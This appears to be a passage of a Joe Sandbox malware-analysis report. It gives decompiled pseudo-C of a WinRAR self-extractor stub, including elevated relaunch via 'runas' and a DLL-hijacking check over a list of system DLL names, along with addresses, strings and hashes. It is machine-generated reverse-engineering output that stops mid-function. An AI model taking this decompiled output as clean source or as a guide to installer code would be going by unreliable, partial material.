										SendMessageW(_t313, 0xb1, 0, 0xffffffff);
										SendMessageW(_t313, 0xc2, 0, 0xbd25b4);
									}
									SetFocus(_t313);
									__eflags =  *0xbe8468;
									if( *0xbe8468 == 0) {
										_t314 = 0x800;
										E00BAFD96(_t320 - 0x1174, _t320 - 0x2174, 0x800);
										E00BBC961(_t287, _t320 - 0x1174, 0x800);
										E00BA3FD6(_t320 - 0x4298, 0x880, E00BADD11(_t287, 0xb9), _t320 - 0x1174);
										_t322 = _t322 + 0x10;
										_push(_t320 - 0x4298);
										_push(0);
										E00BBC9E2();
									} else {
										_push(E00BADD11(_t287, 0xba));
										_push(0);
										E00BBC9E2();
										_t314 = 0x800;
									}
									__eflags =  *0xbe9471;
									if( *0xbe9471 == 0) {
										E00BBD06F(_t320 - 0x2174);
									}
									_push(0);
									_push(_t320 - 0x2174);
									 *(_t320 - 0xe) = 0;
									_t166 = E00BA9F8F(0, _t320);
									_t279 = 1;
									__eflags = _t166;
									if(_t166 != 0) {
										L40:
										_t302 = E00BBA2A0(_t320 - 0x2174);
										 *(_t320 - 0xd) = _t302;
										__eflags = _t302;
										if(_t302 != 0) {
											L43:
											_t169 =  *(_t320 - 0xe);
											L44:
											_t287 =  *0xbe9471;
											__eflags = _t287;
											if(_t287 != 0) {
												L50:
												__eflags =  *(_t320 - 0xd);
												if( *(_t320 - 0xd) != 0) {
													 *0xbe744c = _t279;
													E00BA12E6(_t304, 0x67, 0);
													E00BA12E6(_t304, 0x66, 0);
													SetDlgItemTextW(_t304, _t279, E00BADD11(_t287, 0xe6)); // executed
													E00BA12E6(_t304, 0x69, _t279);
													SetDlgItemTextW(_t304, 0x65, 0xbd25b4); // executed
													_t315 = GetDlgItem(_t304, 0x65);
													__eflags = _t315;
													if(_t315 != 0) {
														_t195 = GetWindowLongW(_t315, 0xfffffff0) | 0x00000080;
														__eflags = _t195;
														SetWindowLongW(_t315, 0xfffffff0, _t195);
													}
													_push(5);
													_push( *0xbe7450);
													_push(_t304);
													E00BBBD35(_t302);
													_push(2);
													_push( *0xbe7450);
													_push(_t304);
													E00BBBD35(_t302);
													_push(0xbfcc88);
													_push(_t304);
													 *0xbffcac = _t279; // executed
													E00BBCF72(_t287, __eflags); // executed
													_push(6);
													_push( *0xbe7450);
													 *0xbffcac = 0;
													_push(_t304); // executed
													E00BBBD35(_t302); // executed
													__eflags =  *0xbe7447;
													if( *0xbe7447 == 0) {
														__eflags =  *0xbe743c;
														if( *0xbe743c == 0) {
															__eflags =  *0xbfdc9c;
															if( *0xbfdc9c == 0) {
																_push(4);
																_push( *0xbe7450);
																_push(_t304); // executed
																E00BBBD35(_t302); // executed
															}
														}
													}
													E00BA12C8(_t304, _t279, _t279);
													 *0xbe744c =  *0xbe744c & 0x00000000;
													__eflags =  *0xbe744c;
													_t182 =  *0xbe7447; // 0x1
													goto L75;
												}
												__eflags = _t287;
												_t169 = (_t169 & 0xffffff00 | _t287 != 0x00000000) - 0x00000001 &  *(_t320 - 0xe);
												__eflags = _t169;
												L52:
												__eflags = _t169;
												 *(_t320 - 0xd) = _t169 == 0;
												__eflags = _t169;
												if(_t169 == 0) {
													L66:
													__eflags =  *(_t320 - 0xd);
													if( *(_t320 - 0xd) != 0) {
														_push(E00BADD11(_t287, 0x9a));
														E00BA3FD6(_t320 - 0x5698, 0xa00, L"\"%s\"\n%s", _t320 - 0x2174);
														E00BA6F5B(0xbdff50, _t279);
														E00BB9EB3(_t304, _t320 - 0x5698, E00BADD11(0xbdff50, 0x96), 0x30);
														 *0xbe743c =  *0xbe743c + 1;
													}
													L12:
													_push(0);
													goto L13;
												}
												GetModuleFileNameW(0, _t320 - 0x1174, _t314);
												_t287 = 0xbeb472;
												E00BAEA7A(0xbeb472, _t320 - 0x174, 0x80);
												_push(0xbea472);
												E00BA3FD6(_t320 - 0x11cb0, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t320 - 0x2174);
												_t322 = _t322 + 0x14;
												 *(_t320 - 0x58) = 0x3c;
												 *((intOrPtr*)(_t320 - 0x54)) = 0x40;
												 *((intOrPtr*)(_t320 - 0x48)) = _t320 - 0x1174;
												 *((intOrPtr*)(_t320 - 0x44)) = _t320 - 0x11cb0;
												 *(_t320 - 0x50) = _t304;
												 *((intOrPtr*)(_t320 - 0x4c)) = L"runas";
												 *(_t320 - 0x3c) = _t279;
												 *((intOrPtr*)(_t320 - 0x38)) = 0;
												 *((intOrPtr*)(_t320 - 0x40)) = 0xbe7468;
												_t317 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
												 *(_t320 - 0x14) = _t317;
												__eflags = _t317;
												if(_t317 == 0) {
													 *(_t320 - 0x1c) =  *(_t320 - 0x14);
												} else {
													 *0xbf5b78 = 0;
													_t231 = GetCommandLineW();
													__eflags = _t231;
													if(_t231 != 0) {
														E00BAFD96(0xbf5b7a, _t231, 0x2000);
													}
													E00BBAA7E(_t287, 0xbf9b7a, 7);
													E00BBAA7E(_t287, 0xbfab7a, 2);
													E00BBAA7E(_t287, 0xbfbb7a, 0x10);
													 *0xbfcc7b = _t279;
													_t287 = 0xbfcb7a;
													E00BAEBED(_t279, 0xbfcb7a, _t320 - 0x174);
													 *(_t320 - 0x1c) = MapViewOfFile(_t317, 2, 0, 0, 0);
													E00BBF300(_t238, 0xbf5b78, 0x7104);
													_t322 = _t322 + 0xc;
												}
												_t220 = ShellExecuteExW(_t320 - 0x58);
												E00BAEC38(_t320 - 0x174, 0x80);
												E00BAEC38(_t320 - 0x11cb0, 0x430c);
												__eflags = _t220;
												if(_t220 == 0) {
													_t319 =  *(_t320 - 0x1c);
													 *(_t320 - 0xd) = _t279;
													goto L64;
												} else {
													 *0xc010a0( *(_t320 - 0x20), 0x2710);
													_t71 = _t320 - 0x18;
													 *_t71 =  *(_t320 - 0x18) & 0x00000000;
													__eflags =  *_t71;
													_t319 =  *(_t320 - 0x1c);
													while(1) {
														__eflags =  *_t319;
														if( *_t319 != 0) {
															break;
														}
														Sleep(0x64);
														_t230 =  *(_t320 - 0x18) + 1;
														 *(_t320 - 0x18) = _t230;
														__eflags = _t230 - 0x64;
														if(_t230 < 0x64) {
															continue;
														}
														break;
													}
													 *0xbfdc9c =  *(_t320 - 0x20);
													L64:
													__eflags =  *(_t320 - 0x14);
													if( *(_t320 - 0x14) != 0) {
														UnmapViewOfFile(_t319);
														CloseHandle( *(_t320 - 0x14));
													}
													goto L66;
												}
											}
											__eflags = _t302;
											if(_t302 == 0) {
												goto L52;
											}
											E00BA3FD6(_t320 - 0x1174, _t314, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
											_t322 = _t322 + 0x10;
											E00BA95B6(_t320 - 0x3198);
											 *(_t320 - 4) =  *(_t320 - 4) & 0x00000000;
											_push(0x11);
											_push(_t320 - 0x1174);
											_t246 = E00BA96BE(_t320 - 0x3198);
											 *(_t320 - 0xd) = _t246;
											__eflags = _t246;
											if(_t246 == 0) {
												_t247 = GetLastError();
												__eflags = _t247 - 5;
												if(_t247 == 5) {
													 *(_t320 - 0xe) = _t279;
												}
											}
											_t39 = _t320 - 4;
											 *_t39 =  *(_t320 - 4) | 0xffffffff;
											__eflags =  *_t39;
											_t169 = E00BA95E8(_t320 - 0x3198, _t314); // executed
											_t287 =  *0xbe9471;
											goto L50;
										}
										_t248 = GetLastError();
										_t302 =  *(_t320 - 0xd);
										__eflags = _t248 - 5;
										if(_t248 != 5) {
											goto L43;
										}
										_t169 = _t279;
										 *(_t320 - 0xe) = _t169;
										goto L44;
									} else {
										_t249 = GetLastError();
										__eflags = _t249 - 5;
										if(_t249 == 5) {
											L39:
											 *(_t320 - 0xe) = _t279;
											goto L40;
										}
										__eflags = _t249 - 3;
										if(_t249 != 3) {
											goto L40;
										}
										goto L39;
									}
								} else {
									_t279 = 1;
									_t182 = 1;
									 *0xbe7447 = 1;
									L75:
									__eflags =  *0xbe743c;
									if( *0xbe743c <= 0) {
										goto L26;
									}
									__eflags = _t182;
									if(_t182 != 0) {
										goto L26;
									}
									 *0xbe7440 = _t279;
									SetDlgItemTextW(_t304, _t279, E00BADD11(_t287, 0x90));
									_t292 =  *0xbdff50; // 0x0
									__eflags = _t292 - 9;
									if(_t292 != 9) {
										__eflags = _t292 - 3;
										_t189 = ((0 | _t292 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
										__eflags = _t189;
										 *(_t320 - 0x14) = _t189;
										_t316 = _t189;
									} else {
										_t316 = 0xa0;
									}
									_t190 = E00BADD11(_t292, 0x96);
									E00BB9EB3(_t304, E00BADD11(_t292, _t316), _t190, 0x30);
									goto L125;
								}
							}
							_t279 = 1;
							__eflags =  *0xbe7441;
							if( *0xbe7441 == 0) {
								goto L26;
							}
							goto L25;
						}
						__eflags =  *0xbffcac;
						if( *0xbffcac == 0) {
							goto L23;
						} else {
							__eflags =  *0xbffcad;
							_t256 = _t149 & 0xffffff00 |  *0xbffcad == 0x00000000;
							__eflags = _t256;
							 *0xbffcad = _t256;
							_t257 = E00BADD11((0 | _t256 != 0x00000000) + 0xe6, (0 | _t256 != 0x00000000) + 0xe6);
							_t279 = 1;
							SetDlgItemTextW(_t304, 1, _t257);
							while(1) {
								__eflags =  *0xbffcad;
								if( *0xbffcad == 0) {
									goto L125;
								}
								__eflags =  *0xbe7447;
								if( *0xbe7447 != 0) {
									goto L125;
								}
								_t261 = GetMessageW(_t320 - 0x74, 0, 0, 0);
								__eflags = _t261;
								if(_t261 == 0) {
									goto L125;
								} else {
									_t263 = IsDialogMessageW(_t304, _t320 - 0x74);
									__eflags = _t263;
									if(_t263 == 0) {
										TranslateMessage(_t320 - 0x74);
										DispatchMessageW(_t320 - 0x74);
									}
									continue;
								}
							}
							goto L125;
						}
					}
					_t268 = _t149 - 1;
					__eflags = _t268;
					if(_t268 == 0) {
						_t279 = 1;
						__eflags =  *0xbe744c;
						 *0xbe7447 = 1;
						if( *0xbe744c == 0) {
							goto L12;
						}
						__eflags =  *0xbe743c;
						if( *0xbe743c != 0) {
							goto L125;
						}
						goto L12;
					}
					__eflags = _t268 == 0x65;
					if(_t268 == 0x65) {
						_t272 = E00BA1241(_t304, E00BADD11(_t287, 0x64), _t320 - 0x1174);
						__eflags = _t272;
						if(_t272 != 0) {
							SetDlgItemTextW(_t304, 0x66, _t320 - 0x1174);
						}
						goto L1;
					}
					goto L7;
				}
				L1:
				_t116 = 1;
				goto L126;
			}

0x00bbae20
0x00bbae20
0x00bbae25
0x00bbae2f
0x00bbae35
0x00bbae39
0x00bbae3d
0x00bbae56
0x00bbae60
0x00bbae60
0x00bbae66
0x00bbb50b
0x00bbb50c
0x00bbb511
0x00bbb518
0x00bbb519
0x00bbb51f
0x00bbb525
0x00bbb527
0x00bbb531
0x00bbb531
0x00bbb537
0x00bbb53c
0x00bbb53e
0x00bbb54b
0x00bbb54b
0x00bbb554
0x00bbb567
0x00bbb56a
0x00bbb57c
0x00bbb584
0x00bbb58a
0x00bbb592
0x00bbb594
0x00bbb597
0x00bbb59c
0x00bbb59e
0x00bbb59e
0x00bbb5a6
0x00bbb5ad
0x00bbb5b2
0x00bbb5b7
0x00bbb5bc
0x00bbb5c1
0x00bbb5c2
0x00bbb5c9
0x00bbb5ce
0x00bbb5d0
0x00bbb5d2
0x00bbb5d2
0x00bbb5d8
0x00bbb5df
0x00bbb5e1
0x00bbb5e3
0x00bbb5e9
0x00bbb5ea
0x00bbb5ea
0x00bbb5ef
0x00bbb5f6
0x00bbb606
0x00bbb619
0x00bbb619
0x00bbb61f
0x00bbb626
0x00bbb6d7
0x00bbb6d7
0x00bbb6de
0x00bbb787
0x00bbb787
0x00bbb78e
0x00bbb793
0x00bbb793
0x00bbb799
0x00bbb7a0
0x00bbb7a7
0x00bbb7b1
0x00bbb7b1
0x00bbb7b6
0x00bbb7bb
0x00bbb7bd
0x00bbb7bf
0x00bbb7c6
0x00bbb7c8
0x00bbb7ca
0x00bbb7cb
0x00bbb7d0
0x00bbb7d1
0x00bbb7d3
0x00bbb7dd
0x00bbb7d5
0x00bbb7d5
0x00bbb7d5
0x00bbb7d3
0x00bbb7c6
0x00bbb7e3
0x00bbb7ea
0x00bbb7f9
0x00bbb7f9
0x00000000
0x00bbb7ea
0x00bbb6e4
0x00bbb6eb
0x00000000
0x00000000
0x00bbb6f1
0x00bbb6f8
0x00000000
0x00000000
0x00bbb6fe
0x00bbb700
0x00bbb705
0x00bbb70c
0x00bbb70c
0x00bbb712
0x00bbb71d
0x00bbb71d
0x00bbb723
0x00bbb72e
0x00bbb73f
0x00bbb757
0x00000000
0x00bbb757
0x00bbb725
0x00bbb72c
0x00000000
0x00000000
0x00000000
0x00bbb72c
0x00bbb714
0x00bbb71b
0x00000000
0x00000000
0x00000000
0x00bbb75c
0x00bbb75c
0x00bbb75d
0x00bbb75d
0x00bbb765
0x00bbb77f
0x00bbb784
0x00000000
0x00bbb62c
0x00bbb62c
0x00bbb62e
0x00bbb634
0x00bbb635
0x00bbb63a
0x00bbb63f
0x00bbb641
0x00bbb643
0x00bbb64a
0x00bbb64c
0x00bbb660
0x00bbb66b
0x00bbb670
0x00bbb670
0x00bbb64a
0x00bbb671
0x00bbb677
0x00bbb6ca
0x00bbb6ca
0x00bbb6cb
0x00bbb6d1
0x00bbb6d2
0x00000000
0x00bbb679
0x00bbb67a
0x00bbb680
0x00bbb686
0x00000000
0x00000000
0x00bbb688
0x00bbb68f
0x00000000
0x00000000
0x00bbb691
0x00bbb693
0x00bbb699
0x00bbb69a
0x00bbb69f
0x00bbb6a6
0x00000000
0x00000000
0x00bbb6bc
0x00bbb6c2
0x00bbb6c4
0x00bbafab
0x00bbafab
0x00bbafb1
0x00bbafb1
0x00bbaed6
0x00bbaed7
0x00bbb7ff
0x00bbb7ff
0x00bbb801
0x00bbb807
0x00bbb811
0x00bbb811
0x00000000
0x00bbb6c4
0x00bbb677
0x00bbb626
0x00bbae6c
0x00bbae6f
0x00bbae83
0x00bbae83
0x00000000
0x00bbae83
0x00bbae74
0x00bbae74
0x00bbae77
0x00bbaee2
0x00bbaee9
0x00bbaf81
0x00bbaf90
0x00bbaf96
0x00bbaf9d
0x00bbafb7
0x00bbafbe
0x00bbafda
0x00bbafdc
0x00bbafe2
0x00bbafed
0x00bbafff
0x00bbafff
0x00bbb006
0x00bbb00c
0x00bbb013
0x00bbb02d
0x00bbb041
0x00bbb04e
0x00bbb071
0x00bbb076
0x00bbb07f
0x00bbb080
0x00bbb081
0x00bbb015
0x00bbb01f
0x00bbb020
0x00bbb021
0x00bbb026
0x00bbb026
0x00bbb086
0x00bbb08d
0x00bbb096
0x00bbb096
0x00bbb09b
0x00bbb0a4
0x00bbb0a5
0x00bbb0a8
0x00bbb0af
0x00bbb0b0
0x00bbb0b2
0x00bbb0c9
0x00bbb0d5
0x00bbb0d7
0x00bbb0da
0x00bbb0dc
0x00bbb0f3
0x00bbb0f3
0x00bbb0f6
0x00bbb0f6
0x00bbb0fc
0x00bbb0fe
0x00bbb16d
0x00bbb16d
0x00bbb171
0x00bbb3b1
0x00bbb3b7
0x00bbb3c1
0x00bbb3d3
0x00bbb3dd
0x00bbb3ea
0x00bbb3f9
0x00bbb3fb
0x00bbb3fd
0x00bbb408
0x00bbb408
0x00bbb411
0x00bbb411
0x00bbb417
0x00bbb419
0x00bbb41f
0x00bbb420
0x00bbb425
0x00bbb427
0x00bbb42d
0x00bbb42e
0x00bbb433
0x00bbb438
0x00bbb439
0x00bbb43f
0x00bbb444
0x00bbb446
0x00bbb44c
0x00bbb453
0x00bbb454
0x00bbb459
0x00bbb460
0x00bbb462
0x00bbb469
0x00bbb46b
0x00bbb472
0x00bbb474
0x00bbb476
0x00bbb47c
0x00bbb47d
0x00bbb47d
0x00bbb472
0x00bbb469
0x00bbb485
0x00bbb48a
0x00bbb48a
0x00bbb491
0x00000000
0x00bbb491
0x00bbb177
0x00bbb17e
0x00bbb17e
0x00bbb181
0x00bbb181
0x00bbb183
0x00bbb187
0x00bbb189
0x00bbb347
0x00bbb347
0x00bbb34b
0x00bbb35b
0x00bbb374
0x00bbb382
0x00bbb39c
0x00bbb3a1
0x00bbb3a1
0x00bbaed4
0x00bbaed4
0x00000000
0x00bbaed4
0x00bbb199
0x00bbb1aa
0x00bbb1b0
0x00bbb1b5
0x00bbb1d2
0x00bbb1d7
0x00bbb1da
0x00bbb1e7
0x00bbb1ee
0x00bbb1f7
0x00bbb20f
0x00bbb212
0x00bbb219
0x00bbb21c
0x00bbb21f
0x00bbb22c
0x00bbb22e
0x00bbb231
0x00bbb233
0x00bbb2be
0x00bbb239
0x00bbb239
0x00bbb240
0x00bbb246
0x00bbb248
0x00bbb255
0x00bbb255
0x00bbb261
0x00bbb26d
0x00bbb279
0x00bbb284
0x00bbb28b
0x00bbb290
0x00bbb2ae
0x00bbb2b1
0x00bbb2b6
0x00bbb2b6
0x00bbb2c5
0x00bbb2d9
0x00bbb2ea
0x00bbb2ef
0x00bbb2f1
0x00bbb32b
0x00bbb32e
0x00000000
0x00bbb2f3
0x00bbb2fb
0x00bbb301
0x00bbb301
0x00bbb301
0x00bbb305
0x00bbb308
0x00bbb308
0x00bbb30b
0x00000000
0x00000000
0x00bbb30f
0x00bbb318
0x00bbb319
0x00bbb31c
0x00bbb31f
0x00000000
0x00000000
0x00000000
0x00bbb31f
0x00bbb324
0x00bbb331
0x00bbb331
0x00bbb335
0x00bbb338
0x00bbb341
0x00bbb341
0x00000000
0x00bbb335
0x00bbb2f1
0x00bbb100
0x00bbb102
0x00000000
0x00000000
0x00bbb118
0x00bbb11d
0x00bbb126
0x00bbb12b
0x00bbb135
0x00bbb137
0x00bbb13e
0x00bbb143
0x00bbb146
0x00bbb148
0x00bbb14a
0x00bbb150
0x00bbb153
0x00bbb155
0x00bbb155
0x00bbb153
0x00bbb158
0x00bbb158
0x00bbb158
0x00bbb162
0x00bbb167
0x00000000
0x00bbb167
0x00bbb0de
0x00bbb0e4
0x00bbb0e7
0x00bbb0ea
0x00000000
0x00000000
0x00bbb0ec
0x00bbb0ee
0x00000000
0x00bbb0b4
0x00bbb0b4
0x00bbb0ba
0x00bbb0bd
0x00bbb0c4
0x00bbb0c6
0x00000000
0x00bbb0c6
0x00bbb0bf
0x00bbb0c2
0x00000000
0x00000000
0x00000000
0x00bbb0c2
0x00bbafc0
0x00bbafc2
0x00bbafc3
0x00bbafc5
0x00bbb496
0x00bbb496
0x00bbb49d
0x00000000
0x00000000
0x00bbb4a3
0x00bbb4a5
0x00000000
0x00000000
0x00bbb4b0
0x00bbb4be
0x00bbb4c4
0x00bbb4ca
0x00bbb4cd
0x00bbb4d8
0x00bbb4e2
0x00bbb4e2
0x00bbb4e7
0x00bbb4ea
0x00bbb4cf
0x00bbb4cf
0x00bbb4cf
0x00bbb4f3
0x00bbb501
0x00000000
0x00bbb501
0x00bbafbe
0x00bbafa1
0x00bbafa2
0x00bbafa9
0x00000000
0x00000000
0x00000000
0x00bbafa9
0x00bbaeef
0x00bbaef6
0x00000000
0x00bbaefc
0x00bbaefc
0x00bbaf03
0x00bbaf08
0x00bbaf0a
0x00bbaf19
0x00bbaf21
0x00bbaf24
0x00bbaf73
0x00bbaf73
0x00bbaf7a
0x00bbaf7c
0x00bbaf7c
0x00bbaf2c
0x00bbaf33
0x00000000
0x00000000
0x00bbaf42
0x00bbaf48
0x00bbaf4a
0x00000000
0x00bbaf50
0x00bbaf55
0x00bbaf5b
0x00bbaf5d
0x00bbaf63
0x00bbaf6d
0x00bbaf6d
0x00000000
0x00bbaf5d
0x00bbaf4a
0x00000000
0x00bbaf73
0x00bbaef6
0x00bbae79
0x00bbae79
0x00bbae7c
0x00bbaeb7
0x00bbaeb8
0x00bbaebf
0x00bbaec5
0x00000000
0x00000000
0x00bbaec7
0x00bbaece
0x00000000
0x00000000
0x00000000
0x00bbaece
0x00bbae7e
0x00bbae81
0x00bbae9a
0x00bbae9f
0x00bbaea1
0x00bbaead
0x00bbaead
0x00000000
0x00bbaea1
0x00000000
0x00bbae81
0x00bbae58
0x00bbae5a
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00BBAE25

Part of subcall function 00BA130B: GetDlgItem.USER32(00000000,00003021), ref: 00BA134F
Part of subcall function 00BA130B: SetWindowTextW.USER32(00000000,00BD25B4), ref: 00BA1365

Strings

-el -s2 "-d%s" "-sp%s", xrefs: 00BBB1C1
STARTDLG, xrefs: 00BBAE44
"%s"%s, xrefs: 00BBB363
t, xrefs: 00BBB402
C:\Users\user\Desktop, xrefs: 00BBB21F
LICENSEDLG, xrefs: 00BBB6B1
<, xrefs: 00BBB1DA
__tmp_rar_sfx_access_check_%u, xrefs: 00BBB10B
winrarsfxmappingfile.tmp, xrefs: 00BBB1FC
@, xrefs: 00BBB1E7

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$t$winrarsfxmappingfile.tmp
API String ID: 810644672-3564745130
Opcode ID: 250f81afdfdee6fc85c9add2bf84800cceffadc965ca9b099d38bef9da671b73
Instruction ID: 6385daa349359823dd1d86dfcfe5b9630a92c16e4291ddba04118e3332b4a106
Opcode Fuzzy Hash: 250f81afdfdee6fc85c9add2bf84800cceffadc965ca9b099d38bef9da671b73
Instruction Fuzzy Hash: 3D42B271948284ABEB219BA09C8AFFE7BFCEB12704F5400D5F645A71E1DBF44944CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00BB002D Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E00BB002D(void* __edx, CHAR* _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, CHAR* _a28, CHAR* _a32, CHAR* _a36, CHAR* _a40, CHAR* _a44, CHAR* _a48, CHAR* _a52, CHAR* _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, CHAR* _a72, CHAR* _a76, CHAR* _a80, CHAR* _a84, CHAR* _a88, CHAR* _a92, CHAR* _a96, CHAR* _a100, CHAR* _a104, CHAR* _a108, CHAR* _a112, CHAR* _a116, CHAR* _a120, CHAR* _a124, CHAR* _a128, CHAR* _a132, CHAR* _a136, CHAR* _a140, CHAR* _a144, CHAR* _a148, CHAR* _a152, CHAR* _a156, CHAR* _a160, CHAR* _a164, CHAR* _a168, CHAR* _a172, CHAR* _a176, CHAR* _a180, CHAR* _a184, CHAR* _a188, CHAR* _a192, CHAR* _a196, CHAR* _a200, CHAR* _a204, CHAR* _a208, CHAR* _a212, CHAR* _a216, CHAR* _a220, CHAR* _a224, CHAR* _a228, CHAR* _a232, CHAR* _a236, CHAR* _a240, char _a244, char _a248, short _a752, short _a756, char _a764, short _a768, char _a4844, char _a4848, void _a4856, char _a4860, short _a4864, char _a9148, char _a9156, void _a13256, signed char _a46028) {
				long _v0;
				long _v8;
				char* _t115;
				void* _t123;
				int _t127;
				long _t138;
				int _t164;
				_Unknown_base(*)()* _t173;
				signed char _t180;
				intOrPtr _t194;
				long _t196;
				void* _t197;
				_Unknown_base(*)()* _t198;
				struct HINSTANCE__* _t200;
				signed int _t202;
				signed int _t204;
				void* _t205;
				_Unknown_base(*)()* _t206;
				signed int _t207;
				int _t208;
				void* _t210;

				E00BBE1C0();
				_push(_t207);
				_t180 = 0;
				_t200 = GetModuleHandleW(L"kernel32");
				if(_t200 == 0) {
					L5:
					_t115 =  *0xbdd080; // 0xbd2b54
					_t208 = _t207 | 0xffffffff;
					_a4 = L"version.dll";
					_t201 = 0x800;
					_a8 = L"DXGIDebug.dll";
					_a12 = L"sfc_os.dll";
					_a16 = L"SSPICLI.DLL";
					_a20 = L"rsaenh.dll";
					_a24 = L"UXTheme.dll";
					_a28 = L"dwmapi.dll";
					_a32 = L"cryptbase.dll";
					_a36 = L"lpk.dll";
					_a40 = L"usp10.dll";
					_a44 = L"clbcatq.dll";
					_a48 = L"comres.dll";
					_a52 = L"ws2_32.dll";
					_a56 = L"ws2help.dll";
					_a60 = L"psapi.dll";
					_a64 = L"ieframe.dll";
					_a68 = L"ntshrui.dll";
					_a72 = L"atl.dll";
					_a76 = L"setupapi.dll";
					_a80 = L"apphelp.dll";
					_a84 = L"userenv.dll";
					_a88 = L"netapi32.dll";
					_a92 = L"shdocvw.dll";
					_a96 = L"crypt32.dll";
					_a100 = L"msasn1.dll";
					_a104 = L"cryptui.dll";
					_a108 = L"wintrust.dll";
					_a112 = L"shell32.dll";
					_a116 = L"secur32.dll";
					_a120 = L"cabinet.dll";
					_a124 = L"oleaccrc.dll";
					_a128 = L"ntmarta.dll";
					_a132 = L"profapi.dll";
					_a136 = L"WindowsCodecs.dll";
					_a140 = L"srvcli.dll";
					_a144 = L"cscapi.dll";
					_a148 = L"slc.dll";
					_a152 = L"imageres.dll";
					_a156 = L"dnsapi.DLL";
					_a160 = L"iphlpapi.DLL";
					_a164 = L"WINNSI.DLL";
					_a168 = L"netutils.dll";
					_a172 = L"mpr.dll";
					_a176 = L"devrtl.dll";
					_a180 = L"propsys.dll";
					_a184 = L"mlang.dll";
					_a188 = L"samcli.dll";
					_a192 = L"samlib.dll";
					_a196 = L"wkscli.dll";
					_a200 = L"dfscli.dll";
					_a204 = L"browcli.dll";
					_a208 = L"rasadhlp.dll";
					_a212 = L"dhcpcsvc6.dll";
					_a216 = L"dhcpcsvc.dll";
					_a220 = L"XmlLite.dll";
					_a224 = L"linkinfo.dll";
					_a228 = L"cryptsp.dll";
					_a232 = L"RpcRtRemote.dll";
					_a236 = L"aclui.dll";
					_a240 = L"dsrole.dll";
					_a244 = L"peerdist.dll";
					if( *_t115 == 0x78) {
						L14:
						GetModuleFileNameW(0,  &_a768, _t201);
						E00BAFD96( &_a9156, E00BABBC5(_t223,  &_a768), _t201);
						_t194 = 0;
						_t202 = 0;
						do {
							if(E00BAAC35() < 0x600) {
								_t123 = 0;
								__eflags = 0;
							} else {
								_t123 = E00BAFFE3( *((intOrPtr*)(_t210 + 0x14 + _t202 * 4))); // executed
							}
							if(_t123 == 0) {
								L20:
								_push(0x800);
								E00BABC3B(_t227,  &_a768,  *((intOrPtr*)(_t210 + 0x18 + _t202 * 4)));
								_t127 = GetFileAttributesW( &_a756); // executed
								if(_t127 != _t208) {
									_t194 =  *((intOrPtr*)(_t210 + 0x14 + _t202 * 4));
									L24:
									if(_t180 != 0) {
										L30:
										_t234 = _t194;
										if(_t194 == 0) {
											return _t127;
										}
										E00BABC0F(_t234,  &_a764);
										if(E00BAAC35() < 0x600) {
											_push( &_a9156);
											_push( &_a764);
											E00BA3FD6( &_a4860, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t194);
											_t210 = _t210 + 0x18;
											_t127 = AllocConsole();
											__eflags = _t127;
											if(_t127 != 0) {
												__imp__AttachConsole(GetCurrentProcessId());
												_t138 = E00BC33F3( &_a4856);
												WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4856, _t138,  &_v8, 0);
												Sleep(0x2710);
												_t127 = FreeConsole();
											}
										} else {
											E00BAFFE3(L"dwmapi.dll");
											E00BAFFE3(L"uxtheme.dll");
											_push( &_a9148);
											_push( &_a756);
											E00BA3FD6( &_a4848, 0x864, E00BADD11(_t182, 0xf1), _t194);
											_t210 = _t210 + 0x18;
											_t127 = E00BB9EB3(0,  &_a4844, E00BADD11(_t182, 0xf0), 0x30);
										}
										ExitProcess(0);
									}
									_t204 = 0;
									while(1) {
										_push(0x800);
										E00BABC3B(0,  &_a764,  *((intOrPtr*)(_t210 + 0x38 + _t204 * 4)));
										_t127 = GetFileAttributesW( &_a752);
										if(_t127 != _t208) {
											break;
										}
										_t204 = _t204 + 1;
										if(_t204 < 0x35) {
											continue;
										}
										goto L30;
									}
									_t194 =  *((intOrPtr*)(_t210 + 0x34 + _t204 * 4));
									goto L30;
								}
							} else {
								_t127 = CompareStringW(0x400, 0x1001,  *(_t210 + 0x20 + _t202 * 4), _t208, L"DXGIDebug.dll", _t208); // executed
								_t227 = _t127 - 2;
								if(_t127 != 2) {
									goto L21;
								}
								goto L20;
							}
							L21:
							_t202 = _t202 + 1;
						} while (_t202 < 8);
						goto L24;
					}
					_t196 = E00BC6F22(_t182, _t115);
					_pop(_t182);
					if(_t196 == 0) {
						goto L14;
					}
					GetModuleFileNameW(0,  &_a4864, 0x800);
					_t205 = CreateFileW( &_a4864, 0x80000000, 1, 0, 3, 0, 0);
					if(_t205 == _t208 || SetFilePointer(_t205, _t196, 0, 0) != _t196) {
						L13:
